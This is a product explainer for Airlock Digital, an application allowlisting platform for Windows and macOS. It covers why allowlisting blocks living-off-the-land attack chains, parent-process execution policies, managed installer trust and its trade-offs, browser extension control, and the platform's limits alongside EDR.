Airlock Digital

What is it?

Airlock Digital is an application allowlisting platform for Windows and macOS. It enforces execution control by permitting only approved binaries to run. Unapproved code is blocked at execution time.

The platform provides policy management for enterprise deployments, including integration with software deployment tools (Intune, SCCM, Chocolatey) for automatic trust of deployed applications.

Why did they build it?

Modern attack chains rely on built-in Windows functionality. A typical sequence: phishing email delivers a password-protected ZIP containing an LNK file. The LNK calls BitsAdmin to download a batch file. The batch file executes VBScript, which calls an HTA file, which drops a DLL containing the malware payload. Each step uses signed Microsoft binaries.

EDR products attempt to detect these behavioral chains, but attackers iterate faster than detection rules. Allowlisting blocks the chain at the first unauthorized execution. If the batch file is not on the approved list, subsequent steps never execute.

Windows attack surface continues to expand. Between Windows 10 LTSB and Windows 11 Enterprise, there is approximately a 46% increase in files on disk. Recent Windows versions include SSH, SCP, curl, tar, and 7-zip by default, all signed by Microsoft, all useful for lateral movement and data exfiltration.

How does Airlock Digital handle legitimate use of commonly-abused binaries?

The platform supports granular execution policies. Administrators can permit specific binaries to be called only by approved parent processes. For example: Intel’s diagnostic utility can call WMIC to retrieve BIOS information, while all other processes are blocked from invoking WMIC.

This addresses the challenge Microsoft faces with deprecating functionality. WMIC was announced as deprecated in 2016 for Windows Server 2012. It will be disabled by default in the next Windows 11 version, with removal planned for a future release, a nearly decade-long timeline. Organizations cannot wait for Microsoft deprecation cycles to reduce attack surface.

How does the managed installer feature work?

Applications deployed through enterprise deployment tools (Intune, Chocolatey, SCCM) can be automatically added to the trust list without manual approval. The Airlock agent recognizes installations originating from these deployment systems and trusts the resulting binaries.

This reduces operational overhead for IT teams deploying new software. The trade-off: if the deployment infrastructure is compromised, attacker payloads deployed through these channels will also be trusted. Organizations with elevated threat models should evaluate whether this trade-off is acceptable for their environment.

How does browser extension control function?

Version 5.32 added the ability to block users from installing browser extensions on Safari, Edge, Chrome, and Firefox across Windows and macOS. This prevents users from installing potentially malicious or data-exfiltrating extensions outside of organizational policy.

What are the limitations?

Allowlisting controls code execution. It does not replace endpoint detection and response for post-exploitation detection, memory-based attacks, or behavioral analysis. The platform is designed to complement EDR, not replace it.

Risky Business appearances

Sources

Additional resources mentioned in interview

  • LOLBAS Project (lolbas-project.github.io): Community-maintained list of Windows binaries commonly abused by attackers
  • Microsoft recommended block rules: Microsoft’s list of utilities recommended for WDAC blocking
  • WinUtil (github.com/ChrisTitusTech/winutil): PowerShell scripts for removing Windows functionality not exposed through standard interfaces
  • DISM servicing tool: Windows feature management at build time
  • Windows LTSB/LTSC: Long-term servicing builds with reduced consumer functionality
  • Windows Server Core: GUI-less Windows Server installation that eliminates RDP-based attack patterns